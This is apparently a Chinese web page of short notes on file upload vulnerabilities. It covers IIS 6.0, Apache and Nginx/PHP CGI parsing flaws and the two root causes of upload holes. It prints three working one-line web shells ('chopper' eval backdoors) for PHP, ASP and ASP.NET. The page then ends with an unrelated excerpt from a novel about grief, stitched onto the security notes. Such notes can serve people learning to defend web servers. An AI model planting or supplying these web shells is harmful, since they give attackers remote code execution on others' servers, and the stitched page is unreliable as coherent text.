首页 > 代码库 > 上传漏洞

上传漏洞

解析漏洞

 IIS 解析漏洞

IIS6.0 存在两个漏洞:

  1.当建立*.asa,*.asp格式的文件夹时,其目录下的任意文件都被IIS当作asp 文件解析

  2.当文件为*.asp;1.jpg 时,IIS同样会以ASP脚本来执行

---经典漏洞:WebDav

Apache 解析漏洞

Apache在解析文件时,当碰到不认识的扩展名时,会从后向前解析,直到碰到的扩展名为止,如都不认识,将会暴露其源码。

PHP CGI 解析漏洞 / Nginx 解析漏洞

 

一句话木马

PHP:		<?php  @eval($_POST[‘chopper’]);?>
ASP:		<%eval  request(“chopper”)%>
ASP.NET	<%@  Page Language=”Jscript”%><%eval  (Request.Item[“chopper”],”unsafe”);%>

  

 

上传漏洞最终的形成原因主要有以下两点:

  1. 目录过滤不严,攻击者可能建立畸形目录
  2. 文件未重命名,攻击者可能利用Web容器解析漏洞

 

 


    他问:”你知道我失去她后最后会的是什么吗?“她摇摇头。
    ”我最后悔没有搏一搏。” 
    ”伊丽莎白得的是脑癌,雷克斯。你可以怎么搏?” 
    ”医生说她会死的时候,我只是握着她的手,选择了放弃。我们都放弃了。我知道这也许不会改变什么,但真希望当时我让她看见我有多么想留住她。莫林,我应该大怒一场的。”

摘自《一个人的朝圣》 . 20 莫琳与公关代表            

 

上传漏洞